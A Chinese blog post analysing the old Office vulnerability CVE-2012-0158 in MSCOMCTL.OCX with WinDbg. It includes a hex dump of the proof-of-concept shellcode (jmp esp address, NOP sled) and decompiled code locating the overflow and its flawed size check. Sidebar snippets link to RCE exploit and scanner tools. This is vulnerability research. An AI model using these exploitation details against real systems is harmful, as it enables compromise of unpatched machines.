也调了下老洞CVE ‐2012‐0158

最新推荐文章于 2024-04-30 09:15:08 发布
最新推荐文章于 2024-04-30 09:15:08 发布
阅读量2.1k 收藏
点赞数
文章标签: microsoft office c vba file windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shevacoming/article/details/7992738
版权

没怎么调过洞,看雪随便搜了一下cve,发现这个比较多


几篇结果都在大篇幅的讲怎么定位溢出点,有那么复杂么……栈上下一个内存写入的条件断点就断下来了吧,不过分析过漏洞之后,只知道代码逻辑的bug。。。但是至于doc的文件结构哪部分的问题,什么问题,如何构造这个poc,就又是需要花很多功夫了


触发一次poc,发现poc最后会弹出计算器并且退出,于是 bp ExitProcess

 

断下后dd esp查看返回地址是

 

0011ac57 c3         ret

 

重启程序,下一个内存写入条件断点

ba w1 0011ac57  ".if(by(0011ac57)==0xc3){}.else{gc;}"

 

不一会儿就断下来了

 

0:000> g

*** ERROR: Symbol file could not befound.  Defaulted to export symbols forC:\Program Files\Microsoft Office\OFFICE12\VBE6.DLL -

ModLoad: 27580000 27685000   C:\Program Files\Common Files\MicrosoftShared\OFFICE12\VBA\MSCOMCTL.OCX

ModLoad: 76320000 76367000   C:\WINDOWS\system32\comdlg32.dll

*** ERROR: Symbol file could not befound.  Defaulted to export symbols forC:\Program Files\Common Files\Microsoft Shared\OFFICE12\VBA\MSCOMCTL.OCX -

eax=00008282 ebx=020357b8 ecx=00002074edx=00000000 esi=0020d2f8 edi=0011ac70

eip=275c87cb esp=0011ab84 ebp=0011ab94iopl=0         nv up ei pl nz na pe cy

cs=001b ss=0023  ds=0023  es=0023 fs=003b  gs=0000             efl=00010207

MSCOMCTL!DllGetClassObject+0x41a87:

275c87cb f3a5            rep movs dword ptr es:[edi],dwordptr [esi]

 

 

然后kv一下,

 

0:000> kv

ChildEBP RetAddr  Args to Child             

WARNING: Stack unwind information notavailable. Following frames may be wrong.

0011ab94 275c8a0a 0011abc00020d248 00008282 MSCOMCTL!DllGetClassObject+0x41a87

0011ac90 2758aee8 00204cf8 00000000020357b8 MSCOMCTL!DllGetClassObject+0x41cc6

00000000 00000000 00000000 0000000000000000 MSCOMCTL!DllGetClassObject+0x41a4

这就是shellcode

0:000> db 0011abc0 ;

0011abc0 00 00 00 00 00 00 00 00-00 00 00 00 12 45 fa 7f  .............E.. //jmp esp

0011abd0 90 90 90 90 90 90 90 90-8b c4 05 10 01 00 00 c7  ................

0011abe0 00 24 03 4d 08 e9 5a 00-00 00 6b 65 72 6e 65 6c  .$.M..Z...kernel

0011abf0 33 32 00 df 2d 89 8c 1b-81 7d ef 42 9d 85 85 d6  32..-....}.B....

0011ac00 4e 99 59 5a 61 d8 54 93-77 77 21 9d 4a 62 68 c3  N.YZa.T.ww!.Jbh.

0011ac10 53 a3 83 6a 6b df 5c 5a-8a 1d 2b 4f 2c 45 28 81  S..jk.\Z..+O,E(.

0011ac20 71 f5 40 01 92 8f 05 ba-36 c1 0a 61 61 61 61 73  q.@.....6..aaaas

0011ac30 68 65 6c 6c 33 32 00 8b-98 8a 31 61 61 61 61 6f  hell32....1aaaao

 

 

 

int __cdecl sub_275C876D(void *a1, LPVOID lpMem, SIZE_T dwBytes)

{

  intresult; // eax@1

 LPVOID v4; // ebx@1

 LPVOID v5; // eax@3

  intv6; // esi@4

  intv7; // [sp+Ch] [bp-4h]@1

 const void *v8; // [sp+1Ch] [bp+Ch]@3

 

  v4= lpMem;

 result = (*(int (__stdcall **)(LPVOID, int *, signed int,_DWORD))(*(_DWORD *)lpMem + 12))(lpMem, &v7, 4, 0);

  if( result >= 0 )

  {

   if ( v7 == dwBytes )

    {

     v5 = HeapAlloc(hHeap, 0, dwBytes);

     v8 = v5;

     if ( v5 )

     {

       v6 = (*(int (__stdcall **)(LPVOID, LPVOID, SIZE_T, _DWORD))(*(_DWORD*)v4 + 12))(v4, v5, dwBytes, 0);

       if ( v6 >= 0 )

       {

         memcpy(a1, v8, dwBytes);           //溢出点

         v6 = (*(int (__stdcall **)(LPVOID, _UNKNOWN *, SIZE_T, _DWORD))(*(_DWORD*)v4 + 12))(

                 v4,

                 &unk_27632368,

                 ((dwBytes + 3) &0xFFFFFFFC) - dwBytes,

                 0);

       }

       HeapFree(hHeap, 0, (LPVOID)v8);

       result = v6;

     }

     else

     {

       result = 0x8007000Eu;

     }

    }

   else

    {

     result = 0x8000FFFFu;

    }

  }

 return result;

}

再查看一下他的调用者

int __stdcall sub_275C89C7(int a1, void *lpMem)

{

  intresult; // eax@1

 BSTR v3; // ebx@1

  intv4; // esi@4

  intv5; // [sp+Ch] [bp-14h]@1

 SIZE_T dwBytes; // [sp+14h] [bp-Ch]@3

  intv7; // [sp+18h] [bp-8h]@4

  intv8; // [sp+1Ch] [bp-4h]@8

 

  v3= (BSTR)lpMem;

 result = sub_275C876D(&v5, lpMem, 0xCu);

  if( result >= 0 )

  {

    if ( v5 == 0x6A626F43&& dwBytes >= 8 )        //覆盖大小错误的判断为>=8 导致可覆盖多字节

    {

     v4 = sub_275C876D(&v7, v3, dwBytes);

     if ( v4 >= 0 )

     {

       if ( !v7 )

         goto LABEL_8;

       lpMem = 0;

        v4 = sub_275C8A59((UINT)&lpMem,(int)v3);

       if ( v4 >= 0 )

       {

         sub_27585BE7((BSTR)lpMem);

         SysFreeString((BSTR)lpMem);

LABEL_8:

         if ( v8 )

           v4 = sub_275C8B2B(a1 + 20, v3);

         return v4;

       }

     }

     return v4;

    }

   result = -2147418113;

  }

 return result;

}


Shevacoming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
综采工作面自然发火综合治理浅析
05-19
开滦集团唐山矿T1391工作面三面被采空区包围,各采空区老洞内有多处发火隐患,通过采取采区内均压控制,并设立发火隐患观测站超前打钻探测,使巷道掘进安全通过工作面各条老洞,杜绝了自然发火事故,保证了工作面的正常...
mysql信息泄露漏洞_CVE-2012-5615 MySQL/MariaDB 信息泄露漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_31755771的博客
01-19 424
# MySQL User Account Enumeration Utility# When an attacker authenticates using an incorrect password# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server# the mysql se...
mysql 缓冲区溢出_CVE-2012-5611MySQL/MariaDB 基于栈的缓冲区溢出漏洞
weixin_39894932的博客
01-19 524
利用条件:需要有效的MySQL用户名和密码1、MySQL零日漏洞概述为了确定最近MySQL零日漏洞的严重程度,我们首先必须深入分析每个漏洞。这些漏洞已经被分配了以下公共漏洞和暴露(Common Vulnerabilities and Exposures CVE)ID:◆ CVE-2012-5611 MySQL基于堆栈的缓冲区溢出:这是通过发送超长参数到GRANT FILE命令来触发的,该操作会导...
CVE-2012-5611MySQL/MariaDB 基于栈的缓冲区溢出漏洞
weixin_34125592的博客
05-14 325
简述及利用代码:http://cve.scap.org.cn/CVE-2012-5611.html。利用条件:需要有效的MySQL用户名和密码1、MySQL零日漏洞概述  为了确定最近MySQL零日漏洞的严重程度,我们首先必须深入分析每个漏洞。这些漏洞已经被分配了以下公共漏洞和暴露(Common Vulnerabilities and Exposures CVE)ID:  ...
陈年老洞CVE-2017-11882漏洞分析
WLINX
03-16 780
目录 漏洞简介 影响版本 Office基础 漏洞分析 获取POC 漏洞演示 漏洞定位 漏洞分析 漏洞简介 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了长达17年的Office远程代码执行(CVE-2017-11882)陈年老洞。该漏洞属于缓冲区溢出类型漏洞,影响目前流行的所有Office版本,产生漏洞原因于EQNEDT32.EXE...
XStream CVE-2019-10173漏洞分析
fnmsd的博客
08-01 4767
前言 首发NOSEC 该漏洞为CVE-2013-7285的补丁“绕过”。 这是一个很迷的洞,POC与CVE-2013-7285一毛一样,该Poc在XStream <=1.4.6和1.4.10上可用,也就是说开始修复的漏洞后来又出现了。 **吐句槽:**漏洞修复的版本在为1.4.11为2018年10月份发布,然后CVE编号是2019年的= = 官方关于漏洞这么写的(感谢Badcode师傅给的...
漏洞分析之CVE-2017-11882
11-26 193
漏洞分析之 CVE-2017-11882 目录 漏洞分析之 CVE-2017-11882目录☛ 漏洞介绍☛ 漏洞分析☛ 1.漏洞分析环境与工具☛ 2.获取 Poc[点击????]☛ 3.复现漏洞☛ 4.分析漏洞☛ 5.漏洞利用☛ 6.利用漏洞2☛ 总结☛ 参考资料完成时间:2018-10-23 10:24:05 星期二 ☛ 漏洞介绍 安全公司Embedi最早报告了漏洞,其出现在...
补丁不给力,Windows漏洞 (CVE-2020-0986) 沦为新0day,或于2021年修复
smellycat000的专栏
12-24 1149
聚焦源代码安全,网罗国内外最新资讯!6月份,微软发布补丁,修复了 Windows 操作系统中当时已遭利用的 0day (CVE-2020-0986)。该漏洞可使攻击者在失陷机器上将权限...
Python曝出15年“老洞”,绿盟君教你如何不“踩坑”
yul364102的博客
09-26 162
Lars指出,Tarfile容易受到所有已知针对tar程序的攻击,并列举出9大攻击可能,包括路径遍历、符号链接文件攻击、权限操作、内存泄露等,并强Tarfile 只是是一个库,不能替代 GNU tar。在一个月后,Lars提议用一个新类SafeTarFile,它是 Tarfile 类的子类和替代品,来解决安全问题,不过截止到2021年2月,SafeTarFile 没有通过现有的测试[3]。以下是一个典型的6行代码做的一个攻击示范。此外,在代码中也要防止类似于上文中,利用Tarfile构造的恶意攻击。
近两年常用的RCE漏洞收集
Websec
04-11 5347
1、Spring Cloud RCE CVE-2022-22965 https://github.com/fullhunt/spring4shell-scan log4j漏洞: https://github.com/fullhunt/log4j-scan/blob/master/log4j-scan.py 2、weblogic反序列化 WeblogicScan:https://github.com/rabbitmask/WeblogicScan 3、shiro反序列化 shiroExploit:https:
十一、大模型-Semantic Kernel与 LangChain 的对比
最新发布
xiaoqi270620903的专栏
04-30 2011
代表了微软在 AI 应用开发领域的探索,其功能和 LangChain 有所相似,但 Semantic Kernel 是为应用开发开发人员创建的,使构建企业 AI 编排器变得容易,这是 Copilot Stack 的中心。LangChain则是由 Harrison Chase 创立,其职业是 ML 工程师,更多是从 ML 工程师角度架构应用,LangChain 开源社区的贡献非常活跃,目前已经有 29k star。
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8720
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3124
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 3588
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1487
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2171
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 3894
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
C语言经典小游戏之----推箱子
嵌入式技术开发
02-25 4562
在进行推箱子的实验中,可以使用对应的API函数来改变对应箱子的颜色,也需要根据,人在移动的过程中,可以通过方向键,并改变对应的颜色,从而实现控制人物的目的。 代码实现如下: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<windows.h> #include<conio.h> int x = 0, y = 0; //存储当前使用的...
关于Dubbo的mock=true降级无法用降级类ServiceMock的解决方案
weixin_45754452的博客
02-25 1275
问题 消费者使用mock=“true”,想用TestServiceMock进行服务降级无法用 原因 我的项目结构如下,首先要知道服务降级代码应该是谁执行的,服务降级是服务消费者也就是controller包处对应的服务执行的,因为我只是测试dubbo怎么使用,所以并没有分多模块,但完全可以把一个包理解为一个模块,再看下面配置文件 为什么可以把一个包当成一个模块呢,因为我把配置文件的scan改成controller包然后启动一个服务器,即消费者,如果把scan改成service则可以启动服务提供者服务器

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值